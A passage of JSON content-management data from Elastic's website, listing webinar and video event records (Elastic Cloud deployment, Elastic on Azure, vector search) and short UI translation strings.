Cloud\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","presentation_date":"2021-01-07T20:34:36.000Z","presenter":["blt32ead84760f7f1e9"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Getting started with Elastic Cloud: Launch your first deployment","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Getting started with Elastic Cloud: Launch your first deployment","token":"0sjwq23k","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:34:38.614Z","updated_by":"blt36e890d06c5ec32c","url":"/virtual-events/launch-your-first-deployment-elastic-cloud","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"FRFq3Uw6K1Pn1UARPQYoyg","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-02T20:42:32.359Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt176c88a0e6d4e467","_version":6,"locale":"en-us","ACL":{},"created_at":"2022-09-08T22:34:20.160Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"Elastic Cloud","title_l10n":"Get started with Elastic on Microsoft Azure","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eIn this quick video, you'll see how easy it is to deploy Elastic on Microsoft Azure and leverage the native integration to quickly ingest data.\u003c/p\u003e\u003ch4\u003eLearn about\u003c/h4\u003e\u003cul\u003e\u003cli\u003eHow to quickly get started and deploy Elastic on Microsoft Azure\u003c/li\u003e\u003cli\u003eHow to ingest platform resource logs and metrics\u003c/li\u003e\u003cli\u003eHow to collect virtual machine logs and metrics\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/partners/microsoft-azure\" target=\"_self\"\u003eLearn more about Elastic's partnership with Microsoft Azure\u003c/a\u003e\u003c/li\u003e\u003cli\u003eDownload the ebook \u003ca href=\"/cloud/elastic-on-microsoft-azure-four-ways-to-do-more-with-data\" target=\"_self\"\u003e4 ways to do more with data\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?ocid=getting-started-elastic-microsoft-azure\" target=\"_self\"\u003eGet started on the Azure Marketplace\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2021-08-20T17:00:00.000Z","presenter":["blt666366d00a89d67e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":["azure","windows","elastic cloud"],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"Get started with Elastic on Microsoft Azure","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:34:01.332Z","updated_by":"blt36e890d06c5ec32c","url":"/virtual-events/getting-started-elastic-microsoft-azure","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"sfHBco3gAddrB7RaVZZkaz","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-02T20:42:32.381Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd11c1c9d80747694","_version":4,"locale":"en-us","ACL":{},"created_at":"2022-11-21T18:09:19.873Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"Machine learning","title_l10n":"Vector search with Elastic","paragraph_l10n":"\u003cp\u003eYou might have heard of vector search, but maybe are still wondering whether or not your company can benefit.\u003c/p\u003e\u003cp\u003eIn this video, you'll learn why leading organizations are using vector search, powered by \u003ca href=\"/what-is/elasticsearch-machine-learning\" target=\"_self\"\u003emachine learning\u003c/a\u003e, to deliver a new digital experience.\u003c/p\u003e","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eWhen customers can't find information they need, frustration ensues. Your most motivated customers may not even know where to start. Without keywords, they are unable to search for what they mean, which can directly impact your bottom line.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/what-is/vector-search\" target=\"_self\"\u003eVector search\u003c/a\u003e ushers in a new era of search experience — where queries don't have to include specific keywords and semantic search applies to images, audio, and more. You can use it to unlock new ways of intelligent discovery, such as recommendation engines in ecommerce and question-answering using transformer models.\u003c/p\u003e\u003cp\u003eWalkthrough the core pieces needed to implement vector search with Elastic, which supports NLP, approximate nearest neighbor search, and importing pretrained PyTorch models. You can start with traditional retrieval techniques, apply vector search where it matters, and get the best of both worlds to exceed customer expectations.\u003c/p\u003e\u003ch4\u003eLearn about:\u003c/h4\u003e\u003cul\u003e\u003cli\u003eWhy companies are looking at vector search \u003c/li\u003e\u003cli\u003eUnderstanding the vector similarity algorithms\u003c/li\u003e\u003cli\u003eWalkthrough what's needed to implement vector search within the Elastic Platform\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eRevolutionize your search experience:\u003c/h4\u003e\u003cul\u003e\u003cli\u003eDiscover the \u003ca href=\"/blog/why-technology-leaders-need-vector-search\" target=\"_self\"\u003e5 reasons why IT leaders need vector search\u003c/a\u003e.\u003c/li\u003e\u003cli\u003eLearn more about \u003ca href=\"/cloud/cloud-trial-overview\" target=\"_self\"\u003eElastic Cloud\u003c/a\u003e and spin up your 14-day trial.\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2022-11-03T08:00:00.000Z","presenter":["blt395dc4279d31eb8e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":["machine learning","vector search"],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Vector search with Elastic","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:33:45.409Z","updated_by":"blt36e890d06c5ec32c","url":"/events/elasticon/archive/vector-similarity-search","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"dJ7cLsPw9tHoEJhERYLR11","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-02T20:42:32.405Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd51566d5f9741ede","_version":6,"locale":"en-us","ACL":{},"created_at":"2022-08-25T13:14:39.687Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"Elastic Cloud","title_l10n":"Instantly deploy Elastic","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eIn this quick video, you'll see how easy it is to deploy Elastic in any of the supported 50+ regions globally.\u003c/p\u003e\n\u003ch4\u003eLearn about\u003c/h4\u003e\u003cul class=\"list-green\"\u003e\u003cli\u003eHow to quickly get started and deploy Elastic\u003c/li\u003e\u003cli\u003eHow to configure your deployment\u003c/li\u003e\u003cli\u003eHow to ingest data\u003c/li\u003e\u003cli\u003eWhat integrations Elastic offers\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eHow to Deploy Elastic\u003c/h4\u003e\u003col\u003e\u003cli\u003eSign-up for an Elastic account.\u003c/li\u003e\u003cli\u003eGive your deployment a name.\u003c/li\u003e\u003cli\u003eChoose a cloud provider including Google Cloud, Microsoft Azure, or AWS.\u003c/li\u003e\u003cli\u003eSelect your geographical region, hardware, and version preferences.\u003c/li\u003e\u003cli\u003eCreate a username \u0026 password while your deployment is created.\u003c/li\u003e\u003cli\u003eCopy or download your credentials.\u003c/li\u003e\u003cli\u003eAdd data using robust ingestion tools and integrations.\u003c/li\u003e\u003c/ol\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul class=\"list-green\"\u003e\u003cli\u003eLearn how to get \u003ca href=\"/getting-started\" target=\"_self\"\u003e\u0026nbsp;started with Elastic\u003c/a\u003e\u003c/li\u003e\u003cli\u003eExplore the \u003ca href=\"https://demo.elastic.co/\" target=\"_self\"\u003elive demo environment\u003c/a\u003e\u003c/li\u003e\u003cli\u003e[Ebook] \u003ca href=\"/campaigns/tips-and-tricks-for-getting-the-most-out-of-elastic-cloud\" target=\"_self\"\u003eTips and tricks for getting the most our of Elastic Cloud\u003c/a\u003e\u003c/li\u003e\u003cli\u003e[Ebook] \u003ca href=\"/campaigns/strategies-for-saving-money-with-elastic-cloud\" target=\"_self\"\u003eManage your total cost of ownership\u003c/a\u003e\u003c/li\u003e\u003cli\u003eWant to try it for yourself? \u003ca href=\"/elasticsearch/service?rogue=cee-gic\u0026baymax=\u0026storm=virtual-event-resources\u0026elektra=enterprise-search-trend-machine-learning-powered-relevance\" target=\"_self\"\u003eLearn more about Elastic Cloud\u003c/a\u003e or, if you're ready to get started,\u003ca href=\"https://cloud.elastic.co/registration?elektra=webinar\u0026storm=landing-page\u0026rogue=cloudtrial\" target=\"_self\"\u003e spin up a free 14-day trial\u003c/a\u003e.\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2022-08-24T07:00:00.000Z","presenter":["blt32ead84760f7f1e9"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[],"tags_region":[],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Instantly deploy Elastic","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:33:27.236Z","updated_by":"blt36e890d06c5ec32c","url":"/demo-gallery/instantly-deploy-elastic","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"MULPChFeqDicZKrfSgPfq4","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2024-12-02T20:42:32.464Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf823ab46774d4aae","_version":5,"locale":"en-us","ACL":{},"created_at":"2019-02-05T07:22:40.307Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"description":"","email_merchandising_placement_number":null},"hour_time_format":false,"image":null,"main_header":{"title_l10n":"Elasticsearch Helping to Put Newspapers Ahead of the Digital Fold ","cta_list":{"cta_title_l10n":"","cta_type":null,"url":""},"paragraph_l10n":"","topic_heading_l10n":""},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","success_message_l10n":"","cta_title_l10n":"","fallback":"","gdpr_load_id":"","gdpr_text":[]},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eThis session will cover how the Daily Mail have adopted Elasticsearch as an alternative query database and how this is just the first step in revolutionising how people get their news and consume it.\u003c/p\u003e","presentation_date":"2014-11-12T18:30:00.000Z","presenter":[],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":["english","(uk)","conference","elasticsearch","mailonline","analytics","big","data","london","newspapers","journalism"],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[],"tags_region":[],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Elasticsearch Helping to Put Newspapers Ahead of the Digital Fold","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-02T20:32:47.352Z","updated_by":"blt36e890d06c5ec32c","url":"/virtual-events/elasticsearch-helping-to-put-newspapers-ahead-of-the-digital-fold","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"iNghs7KKL8PyPrWsM5ziST","data_chapter":"","video_has_playlist":false},"zoom_id":"","publish_details":{"time":"2024-12-13T17:28:54.033Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],1533],"apiContent":{},"translateContent":[[{"uid":"bltfb44eb6e899331a4","_version":1,"locale":"en-us","ACL":{},"created_at":"2024-11-13T23:43:06.196Z","created_by":"blt36e890d06c5ec32c","english_content":"Or","tags":[],"title":"Or","translate_content_l10n":"Or","updated_at":"2024-11-13T23:43:06.196Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"time":"2024-11-13T23:44:21.198Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2aeecde6c1729945","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-01-26T21:09:02.610Z","created_by":"blt36e890d06c5ec32c","english_content":"Load more","tags":[],"title":"Load more","translate_content_l10n":"Load more","updated_at":"2024-09-03T16:41:46.744Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"time":"2024-09-03T16:42:00.289Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":1,"locale":"en-us","uid":"blt6f3ad4a078adc611","ACL":{},"created_at":"2024-05-28T12:47:25.539Z","created_by":"blt3e52848e0cb3c394","english_content":"Overview","tags":[],"title":"Overview","translate_content_l10n":"Overview","updated_at":"2024-05-28T12:47:25.539Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-05-28T12:47:29.022Z","user":"blt3e52848e0cb3c394"}},{"_version":4,"locale":"en-us","uid":"blt3b08c089ffd331e6","ACL":{},"created_at":"2023-01-26T21:09:09.267Z","created_by":"blt36e890d06c5ec32c","english_content":"Can't make it? Register and we'll send you the recording. You'll also receive an email with related content","tags":[],"title":"Can't make it? Register and we'll send you the recording. You'll also receive an email with related content","translate_content_l10n":"Can't make it? Register and we'll send you the recording. You'll also receive an email with related content.","updated_at":"2023-12-18T21:59:16.399Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-18T21:59:19.133Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt7a2b7e50bb030ed8","ACL":{},"created_at":"2023-01-26T21:09:00.746Z","created_by":"blt36e890d06c5ec32c","english_content":"You'll also receive an email with related content.","tags":[],"title":"You'll also receive an email with related content","translate_content_l10n":"You'll also receive an email with related content.","updated_at":"2023-12-18T21:58:39.250Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-18T21:58:43.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt7a2ecc87e95e0fed","ACL":{},"created_at":"2023-08-23T22:51:28.540Z","created_by":"blt36e890d06c5ec32c","english_content":"\u003cp\u003eBy submitting you acknowledge that you've read and agree to our \u003ca href=\"/legal/elastic-cloud-account-terms\" target=\"_blank\"\u003eTerms of Service\u003c/a\u003e, and that Elastic may \u003ca href=\"/legal/privacy-statement#how-we-use-the-information\" target=\"_blank\"\u003econtact you\u003c/a\u003e about our related products and services, using the details you provide above. See \u003ca href=\"/legal/privacy-statement/\" target=\"_blank\"\u003eElastic’s Privacy Statement\u003c/a\u003e for more details or to opt-out at any time.\u003c/p\u003e","tags":[],"title":"Newsletter GDPR Text","translate_content_l10n":"\u003cp\u003eBy submitting you acknowledge that you've read and agree to our \u003ca href=\"/legal/elastic-cloud-account-terms\" target=\"_blank\"\u003eTerms of Service\u003c/a\u003e, and that Elastic may \u003ca href=\"/legal/privacy-statement#how-we-use-the-information\" target=\"_blank\"\u003econtact you\u003c/a\u003e about our related products and services, using the details you provide above. See \u003ca href=\"/legal/privacy-statement/\" target=\"_blank\"\u003eElastic’s Privacy Statement\u003c/a\u003e for more details or to opt-out at any time.\u003c/p\u003e","updated_at":"2023-08-23T22:51:28.540Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-23T22:52:42.175Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt16f2676801e3267e","ACL":{},"created_at":"2023-08-22T17:00:20.812Z","created_by":"blt36e890d06c5ec32c","english_content":"Speakers","tags":[],"title":"Speakers","translate_content_l10n":"Speakers","updated_at":"2023-08-22T17:00:20.812Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-22T17:01:19.248Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt0cbc24c249b9fd54","ACL":{},"created_at":"2023-07-11T21:21:11.001Z","created_by":"blt3044324473ef223b70bc674c","english_content":"Close","tags":[],"title":"Close","translate_content_l10n":"Close","updated_at":"2023-07-11T21:21:11.001Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-11T21:22:26.797Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt20243cb3a8c574f6","ACL":{},"created_at":"2023-04-27T22:46:08.141Z","created_by":"blt36e890d06c5ec32c","english_content":"See more insights","tags":[],"title":"See more insights","translate_content_l10n":"See more insights","updated_at":"2023-04-27T22:46:08.141Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-04-27T22:47:17.093Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt5e35f797b223487b","ACL":{},"created_at":"2023-04-25T22:44:26.727Z","created_by":"blt36e890d06c5ec32c","english_content":"The content on this page is not available in the selected language. As Elastic grows globally, we continue to support content in multiple languages.","tags":[],"title":"The content on this page is not available in the selected language.","translate_content_l10n":"The content on this page is not available in the selected language. As Elastic grows globally, we continue to support content in multiple languages.","updated_at":"2023-04-25T22:50:03.458Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-04-25T22:50:49.263Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt95f1076dfef4f727","ACL":{},"created_at":"2023-04-03T16:58:30.945Z","created_by":"blt36e890d06c5ec32c","english_content":"Author","tags":[],"title":"Author","translate_content_l10n":"Author","updated_at":"2023-04-03T16:58:30.945Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-04-03T17:02:04.749Z","user":"blt36e890d06c5ec32c"}},{"_version":3,"locale":"en-us","uid":"bltb9e7436e790dc1e1","ACL":{},"created_at":"2023-01-26T21:09:01.075Z","created_by":"blt36e890d06c5ec32c","english_content":"Learn more","tags":[],"title":"Learn more","translate_content_l10n":"Learn more","updated_at":"2023-03-23T23:23:32.443Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-03-23T23:25:05.498Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blte80ec2bf93203454","ACL":{},"created_at":"2023-03-23T23:20:05.096Z","created_by":"blt36e890d06c5ec32c","english_content":"Watch now","tags":[],"title":"Watch now (no PT)","translate_content_l10n":"Watch now","updated_at":"2023-03-23T23:20:05.096Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-03-23T23:23:03.467Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt0b2b84aede5a5e1a","ACL":{},"created_at":"2023-01-26T21:09:00.911Z","created_by":"blt36e890d06c5ec32c","english_content":"Watch now","tags":[],"title":"Watch now","translate_content_l10n":"Watch now","updated_at":"2023-03-23T23:17:38.751Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-03-23T23:19:07.965Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt45ad9978de13cb3c","ACL":{},"created_at":"2023-03-20T19:38:56.211Z","created_by":"blt36e890d06c5ec32c","english_content":"See all top stories","tags":[],"title":"See all top stories","translate_content_l10n":"See all top stories","updated_at":"2023-03-20T19:38:56.211Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-03-20T19:40:01.652Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt0aeca091079429a4","ACL":{},"created_at":"2023-03-20T19:37:29.708Z","created_by":"blt36e890d06c5ec32c","english_content":"Related content","tags":[],"title":"Related content","translate_content_l10n":"Related 